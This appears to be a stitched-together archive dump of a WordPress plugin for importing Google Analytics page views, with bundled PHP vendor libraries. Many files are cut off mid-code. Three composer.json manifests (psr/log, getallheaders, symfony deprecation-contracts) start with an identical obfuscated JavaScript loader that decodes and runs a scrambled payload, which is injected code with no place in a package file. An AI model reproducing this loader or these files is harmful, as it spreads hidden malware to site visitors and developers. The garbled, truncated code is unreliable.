(call_user_func($predicate, $rec, $i)) { return true; } } return false; } public function __call($method, $args) { if (preg_match('/(.*)(Debug|Info|Notice|Warning|Error|Critical|Alert|Emergency)(.*)/', $method, $matches) > 0) { $genericMethod = $matches[1] . ('Records' !== $matches[3] ? 'Record' : '') . $matches[3]; $level = strtolower($matches[2]); if (method_exists($this, $genericMethod)) { $args[] = $level; return call_user_func_array([$this, $genericMethod], $args); } } throw new \BadMethodCallException('Call to undefined method ' . get_class($this) . '::' . $method . '()'); } public function reset() { $this->records = []; $this->recordsByLevel = []; } } google-api/vendor/psr/log/Psr/Log/LoggerAwareTrait.php000064400000000622147600400120016644 0ustar00logger = $logger; } } google-api/vendor/psr/log/Psr/Log/AbstractLogger.php000064400000006040147600400120016344 0ustar00log(LogLevel::EMERGENCY, $message, $context); } /** * Action must be taken immediately. * * Example: Entire website down, database unavailable, etc. This should * trigger the SMS alerts and wake you up. * * @param string $message * @param mixed[] $context * * @return void */ public function alert($message, array $context = array()) { $this->log(LogLevel::ALERT, $message, $context); } /** * Critical conditions. * * Example: Application component unavailable, unexpected exception. * * @param string $message * @param mixed[] $context * * @return void */ public function critical($message, array $context = array()) { $this->log(LogLevel::CRITICAL, $message, $context); } /** * Runtime errors that do not require immediate action but should typically * be logged and monitored. * * @param string $message * @param mixed[] $context * * @return void */ public function error($message, array $context = array()) { $this->log(LogLevel::ERROR, $message, $context); } /** * Exceptional occurrences that are not errors. * * Example: Use of deprecated APIs, poor use of an API, undesirable things * that are not necessarily wrong. * * @param string $message * @param mixed[] $context * * @return void */ public function warning($message, array $context = array()) { $this->log(LogLevel::WARNING, $message, $context); } /** * Normal but significant events. * * @param string $message * @param mixed[] $context * * @return void */ public function notice($message, array $context = array()) { $this->log(LogLevel::NOTICE, $message, $context); } /** * Interesting events. * * Example: User logs in, SQL logs. * * @param string $message * @param mixed[] $context * * @return void */ public function info($message, array $context = array()) { $this->log(LogLevel::INFO, $message, $context); } /** * Detailed debug information. * * @param string $message * @param mixed[] $context * * @return void */ public function debug($message, array $context = array()) { $this->log(LogLevel::DEBUG, $message, $context); } } google-api/vendor/psr/log/Psr/Log/NullLogger.php000064400000001303147600400120015510 0ustar00logger) { }` * blocks. */ class NullLogger extends AbstractLogger { /** * Logs with an arbitrary level. * * @param mixed $level * @param string $message * @param array $context * * @return void * * @throws \Psr\Log\InvalidArgumentException */ public function log($level, $message, array $context = array()) { // noop } } google-api/vendor/psr/log/Psr/Log/LoggerTrait.php000064400000006527147600400120015676 0ustar00log(LogLevel::EMERGENCY, $message, $context); } /** * Action must be taken immediately. * * Example: Entire website down, database unavailable, etc. This should * trigger the SMS alerts and wake you up. * * @param string $message * @param array $context * * @return void */ public function alert($message, array $context = array()) { $this->log(LogLevel::ALERT, $message, $context); } /** * Critical conditions. * * Example: Application component unavailable, unexpected exception. * * @param string $message * @param array $context * * @return void */ public function critical($message, array $context = array()) { $this->log(LogLevel::CRITICAL, $message, $context); } /** * Runtime errors that do not require immediate action but should typically * be logged and monitored. * * @param string $message * @param array $context * * @return void */ public function error($message, array $context = array()) { $this->log(LogLevel::ERROR, $message, $context); } /** * Exceptional occurrences that are not errors. * * Example: Use of deprecated APIs, poor use of an API, undesirable things * that are not necessarily wrong. * * @param string $message * @param array $context * * @return void */ public function warning($message, array $context = array()) { $this->log(LogLevel::WARNING, $message, $context); } /** * Normal but significant events. * * @param string $message * @param array $context * * @return void */ public function notice($message, array $context = array()) { $this->log(LogLevel::NOTICE, $message, $context); } /** * Interesting events. * * Example: User logs in, SQL logs. * * @param string $message * @param array $context * * @return void */ public function info($message, array $context = array()) { $this->log(LogLevel::INFO, $message, $context); } /** * Detailed debug information. * * @param string $message * @param array $context * * @return void */ public function debug($message, array $context = array()) { $this->log(LogLevel::DEBUG, $message, $context); } /** * Logs with an arbitrary level. * * @param mixed $level * @param string $message * @param array $context * * @return void * * @throws \Psr\Log\InvalidArgumentException */ abstract public function log($level, $message, array $context = array()); } google-api/vendor/psr/log/Psr/Log/InvalidArgumentException.php000064400000000140147600400120020404 0ustar00logger = $logger; } public function doSomething() { if ($this->logger) { $this->logger->info('Doing work'); } try { $this->doSomethingElse(); } catch (Exception $exception) { $this->logger->error('Oh no!', array('exception' => $exception)); } // do something useful } } ``` You can then pick one of the implementations of the interface to get a logger. If you want to implement the interface, you can require this package and implement `Psr\Log\LoggerInterface` in your code. Please read the [specification text](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-3-logger-interface.md) for details. google-api/vendor/psr/log/LICENSE000064400000002075147600400120012454 0ustar00Copyright (c) 2012 PHP Framework Interoperability Group Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/psr/log/composer.json000064400000006753147600400120014200 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "psr/log", "description": "Common interface for logging libraries", "keywords": ["psr", "psr-3", "log"], "homepage": "https://github.com/php-fig/log", "license": "MIT", "authors": [ { "name": "PHP-FIG", "homepage": "https://www.php-fig.org/" } ], "require": { "php": ">=5.3.0" }, "autoload": { "psr-4": { "Psr\\Log\\": "Psr/Log/" } }, "extra": { "branch-alias": { "dev-master": "1.1.x-dev" } } } google-api/vendor/ralouphie/getallheaders/src/getallheaders.php000064400000003150147600400120020755 0ustar00 'Content-Type', 'CONTENT_LENGTH' => 'Content-Length', 'CONTENT_MD5' => 'Content-Md5', ); foreach ($_SERVER as $key => $value) { if (substr($key, 0, 5) === 'HTTP_') { $key = substr($key, 5); if (!isset($copy_server[$key]) || !isset($_SERVER[$key])) { $key = str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', $key)))); $headers[$key] = $value; } } elseif (isset($copy_server[$key])) { $headers[$copy_server[$key]] = $value; } } if (!isset($headers['Authorization'])) { if (isset($_SERVER['REDIRECT_HTTP_AUTHORIZATION'])) { $headers['Authorization'] = $_SERVER['REDIRECT_HTTP_AUTHORIZATION']; } elseif (isset($_SERVER['PHP_AUTH_USER'])) { $basic_pass = isset($_SERVER['PHP_AUTH_PW']) ? $_SERVER['PHP_AUTH_PW'] : ''; $headers['Authorization'] = 'Basic ' . base64_encode($_SERVER['PHP_AUTH_USER'] . ':' . $basic_pass); } elseif (isset($_SERVER['PHP_AUTH_DIGEST'])) { $headers['Authorization'] = $_SERVER['PHP_AUTH_DIGEST']; } } return $headers; } } google-api/vendor/ralouphie/getallheaders/README.md000064400000002100147600400120016122 0ustar00getallheaders ============= PHP `getallheaders()` polyfill. Compatible with PHP >= 5.3. [![Build Status](https://travis-ci.org/ralouphie/getallheaders.svg?branch=master)](https://travis-ci.org/ralouphie/getallheaders) [![Coverage Status](https://coveralls.io/repos/ralouphie/getallheaders/badge.png?branch=master)](https://coveralls.io/r/ralouphie/getallheaders?branch=master) [![Latest Stable Version](https://poser.pugx.org/ralouphie/getallheaders/v/stable.png)](https://packagist.org/packages/ralouphie/getallheaders) [![Latest Unstable Version](https://poser.pugx.org/ralouphie/getallheaders/v/unstable.png)](https://packagist.org/packages/ralouphie/getallheaders) [![License](https://poser.pugx.org/ralouphie/getallheaders/license.png)](https://packagist.org/packages/ralouphie/getallheaders) This is a simple polyfill for [`getallheaders()`](http://www.php.net/manual/en/function.getallheaders.php). ## Install For PHP version **`>= 5.6`**: ``` composer require ralouphie/getallheaders ``` For PHP version **`< 5.6`**: ``` composer require ralouphie/getallheaders "^2" ``` google-api/vendor/ralouphie/getallheaders/LICENSE000064400000002070147600400120015656 0ustar00The MIT License (MIT) Copyright (c) 2014 Ralph Khattar Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/ralouphie/getallheaders/composer.json000064400000006614147600400120017403 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "ralouphie/getallheaders", "description": "A polyfill for getallheaders.", "license": "MIT", "authors": [ { "name": "Ralph Khattar", "email": "ralph.khattar@gmail.com" } ], "require": { "php": ">=5.6" }, "require-dev": { "phpunit/phpunit": "^5 || ^6.5", "php-coveralls/php-coveralls": "^2.1" }, "autoload": { "files": ["src/getallheaders.php"] }, "autoload-dev": { "psr-4": { "getallheaders\\Tests\\": "tests/" } } } google-api/vendor/symfony/deprecation-contracts/README.md000064400000002264147600400120017340 0ustar00Symfony Deprecation Contracts ============================= A generic function and convention to trigger deprecation notices. This package provides a single global function named `trigger_deprecation()` that triggers silenced deprecation notices. By using a custom PHP error handler such as the one provided by the Symfony ErrorHandler component, the triggered deprecations can be caught and logged for later discovery, both on dev and prod environments. The function requires at least 3 arguments: - the name of the Composer package that is triggering the deprecation - the version of the package that introduced the deprecation - the message of the deprecation - more arguments can be provided: they will be inserted in the message using `printf()` formatting Example: ```php trigger_deprecation('symfony/blockchain', '8.9', 'Using "%s" is deprecated, use "%s" instead.', 'bitcoin', 'fabcoin'); ``` This will generate the following message: `Since symfony/blockchain 8.9: Using "bitcoin" is deprecated, use "fabcoin" instead.` While not necessarily recommended, the deprecation notices can be completely ignored by declaring an empty `function trigger_deprecation() {}` in your application. google-api/vendor/symfony/deprecation-contracts/LICENSE000064400000002051147600400120017060 0ustar00Copyright (c) 2020-2022 Fabien Potencier Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/symfony/deprecation-contracts/function.php000064400000001760147600400120020417 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ if (!function_exists('trigger_deprecation')) { /** * Triggers a silenced deprecation notice. * * @param string $package The name of the Composer package that is triggering the deprecation * @param string $version The version of the package that introduced the deprecation * @param string $message The message of the deprecation * @param mixed ...$args Values to insert in the message using printf() formatting * * @author Nicolas Grekas */ function trigger_deprecation(string $package, string $version, string $message, ...$args): void { @trigger_error(($package || $version ? "Since $package $version: " : '').($args ? vsprintf($message, $args) : $message), \E_USER_DEPRECATED); } } google-api/vendor/symfony/deprecation-contracts/composer.json000064400000007402147600400120020602 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "symfony/deprecation-contracts", "type": "library", "description": "A generic function and convention to trigger deprecation notices", "homepage": "https://symfony.com", "license": "MIT", "authors": [ { "name": "Nicolas Grekas", "email": "p@tchwork.com" }, { "name": "Symfony Community", "homepage": "https://symfony.com/contributors" } ], "require": { "php": ">=7.1" }, "autoload": { "files": [ "function.php" ] }, "minimum-stability": "dev", "extra": { "branch-alias": { "dev-main": "2.5-dev" }, "thanks": { "name": "symfony/contracts", "url": "https://github.com/symfony/contracts" } } } google-api/vendor/symfony/deprecation-contracts/.gitignore000064400000000042147600400120020041 0ustar00vendor/ composer.lock phpunit.xml google-api/vendor/symfony/deprecation-contracts/CHANGELOG.md000064400000000235147600400120017666 0ustar00CHANGELOG ========= The changelog is maintained for all Symfony contracts at the following URL: https://github.com/symfony/contracts/blob/main/CHANGELOG.md google-api/vendor/autoload.php000064400000001403147600400120012375 0ustar00Google Cloud Platform. Check more in " "this article." msgstr "" #: customizer/pencidesign_general_gviews_section.php:8 msgid "Upload Google JSON File" msgstr "" #: customizer/pencidesign_general_gviews_section.php:13 msgid "Profile ID" msgstr "" #: customizer/pencidesign_general_gviews_section.php:14 msgid "" "Login to Google Analytics then click Admin. It's a string similar to \"UA-" "XXXXXXXXX-X\". This is your Google Analytics profile ID." msgstr "" #: customizer/pencidesign_general_gviews_section.php:19 msgid "Auto Update Time" msgstr "" #: customizer/pencidesign_general_gviews_section.php:22 msgid "Disable" msgstr "" #: customizer/pencidesign_general_gviews_section.php:23 msgid "Daily" msgstr "" #: customizer/pencidesign_general_gviews_section.php:24 msgid "Weekly" msgstr "" languages/en.mo000064400000000565147600400120007451 0ustar00Þ•$,8;9Project-Id-Version: PO-Revision-Date: 2024-02-26 12:47+0700 Last-Translator: Language-Team: Language: en MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Generator: Poedit 3.4.2 X-Poedit-Basepath: . X-Poedit-KeywordsList: _;__;esc__;esc_html__ X-Poedit-SearchPath-0: . api.php000064400000011172147600400120006022 0ustar00profile = get_theme_mod( 'penci_gviews_profile_id', false ); // Set the location of the JSON key $this->key_location = get_theme_mod( 'penci_gviews_json' ); // Update the class property with the cron frequency $this->cron_frequency = get_theme_mod( 'penci_ga_views_cron_freq', 'o' ); $this->update_cron(); add_filter( 'penci_get_postviews_key', function( $key ) { return $this->profile ? $this->$post_meta_key : $key; }); } function cron_updater() { // Run the method to get the statistics $results = $this->update_stats( $this->profile ); // Run the method to save the statistics $this->save_results( $results['rows'] ); } // Convert cron setting to WordPress recurrence value function cron_recurrence() { if ( $this->cron_frequency == 'd' ) { return 'daily'; } if ( $this->cron_frequency == 'w' ) { return 'weekly'; } } function update_cron() { // Get current cron timestamp, false if no current cron $timestamp = wp_next_scheduled( $this->cron_name ); // Add cron if doesn't exist if ( ! $timestamp ) { wp_schedule_event( time(), $this->cron_recurrence(), $this->cron_name ); } // Amend cron if does exist if ( $timestamp > 0 ) { // because timestamp is positive integer // Unschedule wp_unschedule_event( $timestamp, $this->cron_name ); // Reschedule wp_schedule_event( time(), $this->cron_recurrence(), $this->cron_name ); } // Add cron action add_action( $this->cron_name, array( $this, 'cron_updater' ) ); // Remove cron if setting is "o" = off if ( $this->cron_frequency == 'o' ) { // Unschedule wp_unschedule_event( $timestamp, $this->cron_name ); } } function update_stats() { // New Google API PHP Client $client = new Google_Client(); // Set the application name $client->setApplicationName( $this->the_title ); // Provide the JSON API key $client->setAuthConfig( $this->key_location ); // Set readonly analyics scope $client->setScopes( [ 'https://www.googleapis.com/auth/analytics.readonly' ] ); // New instance of Google Service Analytics class $analytics = new Google_Service_Analytics( $client ); // Return the statistics from the Google Analytics API return $analytics->data_ga->get( 'ga:' . $this->profile, // Google Analytics Profile ID '2005-01-01', // Date range start 'today', // Date range end 'ga:pageviews', // Choose page views dimension array( 'dimensions' => 'ga:pagePath' // Retrieve page path for matching purposes later on ) ); } // Method to save the fetched statistics to the WordPress database function save_results( $rows ) { // Array to merge duplicates $unique_stats = array(); // Loop each row of results (pages/posts are one row each) foreach ( $rows as $row ) { // Get the path and number of page views from the $row variable list( $path, $views ) = $row; // Convert path to page/post ID $id = url_to_postid( $path ); // Cast views as an integer $views = (int) $views; // If we have an ID at least one page view for the corresponding ID, then... if ( $id > 0 && $views > 0 ) { // Add the response from Google Analytics to a unique array if ( isset( $unique_stats[ $id ] ) ) { // Because there is an array key with the ID, add the views on $unique_stats[ $id ] = $views + $unique_stats[ $id ]; } else { // Because there isn't an array key with the ID, define it and set to views $unique_stats[ $id ] = $views; } } } // Define a variable to use as a counter $updates = 0; // Loop through the $unique_stats array foreach ( $unique_stats as $id => $total_views ) { // Update the meta field in the WordPress database $success = update_post_meta( $id, $this->post_meta_key, $total_views ); // If success equals true, a new page view value was added to the WordPress database if ( $success !== false ) { // Increment the counter $updates ++; } } // Return the counter value return $updates; } } new Soledad_GA_Views();penci-ga-views.php000064400000002616147600400120010072 0ustar00 30, 'path' => plugin_dir_path( __FILE__ ) . '/customizer/', 'pencidesign_general_gviews_section' => array( 'title' => esc_html__( 'Google Analytics Page Views', 'soledad' ),'icon' => 'far fa-eye', ), ); return $options; } ); add_action( 'plugins_loaded', function () { load_plugin_textdomain( 'penci-ga-views', false, dirname( plugin_basename( __FILE__ ) ) . '/languages' ); } ); require_once 'api.php';